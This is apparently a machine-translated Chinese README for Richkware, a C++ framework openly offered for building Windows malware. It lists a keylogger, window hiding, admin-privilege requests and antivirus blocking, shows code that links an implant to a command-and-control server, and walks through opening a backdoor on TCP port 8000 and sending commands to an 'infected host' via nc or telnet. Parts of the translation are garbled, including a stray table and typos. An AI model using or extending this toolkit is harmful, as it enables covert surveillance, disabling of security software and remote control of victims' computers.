構建Windows惡意軟件的框架,用C ++編寫。
Richkware是網絡和操作系統功能的庫,您可以用來創建惡意軟件。這些功能的組成允許應用程序假設可引用以下惡意軟件類型的行為:
Richkware-Manager-Server:用於管理主機的服務,其中存在使用Richkware Framework開發的惡意軟件實例。
Richkware-Manager-client: Richkware-Manager-Server的客戶端,它從服務器中獲取了所有主機的列表,並且能夠向他們發送任何類型的命令。
| en | 它 | |
|---|---|---|
| 推介會 | ||
| 報告 |
存儲(存儲。H ):
Isadmin和requestAdminPrivileges ( Richkware.h ):檢查並要求管理員特權;
StealthWindow ( Richkware.h ):隱藏應用程序;
OpenApp ( Richkware.h ):打開任意應用程序;
KeyLogger ( Richkware.h ):將所有按鍵存儲在文件中;
BlockApps E UnblockApps ( blockApps.h ):塊和解密應用程序(Antivirus,...)。
這些是構建和使用Richkware的基本要求:
打開main.cpp,並創建一個Richkware實例。
如果您已經部署了RMS,則可以按以下方式初始化惡意軟件:
int main() {
Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
...
return 0;
}
它從Richkware-Manager-server獲得了一個安全的密鑰,並將密鑰設置為加密密鑰。 DefaultPass被用作臨時加密密鑰,以確保與RMS進行安全通信,如果惡意軟件無法達到RMS獲取其加密KET的RMS,則將使用DefaultPass作為加密密鑰。
否則,如果您尚未部署RMS,則可以使用:
Richkware richkware("Richk","richktest");
這樣,它將“ Richktest”用作加密密鑰。
在main.cpp實現之後,您可以按以下方式進行編譯。
make
在下面的示例中,我們稱之為“服務器”,這是一種使用Richkware Framework開發的惡意軟件,並在其中啟用了創建服務器的功能,而惡意軟件的創建者( Hacker )則試圖與受感染的PC建立連接。
呼叫框架函數啟動器在主機上,它在端口上啟動服務器,在下面的示例中是TCP端口8000。請記住,如果另一個程序已經使用了端口,則不能使用該端口,直到程序停止為止。
int main () {
...
richkware.network.server.Start("8000");
...
}
在安裝Java虛擬機的所有系統中,您都可以使用Richkware-Manager-Client,否則,如果不存在,則可以輕鬆使用終端。
在UNIX系統中,您可以使用NetCat ,並運行以下命令:
nc <serverName> 8000
如果服務器在開放端口上收到了請求並成功創建連接,則它對客戶端確認連接的建立做出了響應,然後您可以編寫:
[[1]]COMMAND
其中命令是必須在服務器運行的受感染主機上執行的命令。
在Windows中,您可以以相同的方式使用Telnet :
telnet <serverName> 8000
...
[[1]]COMMAND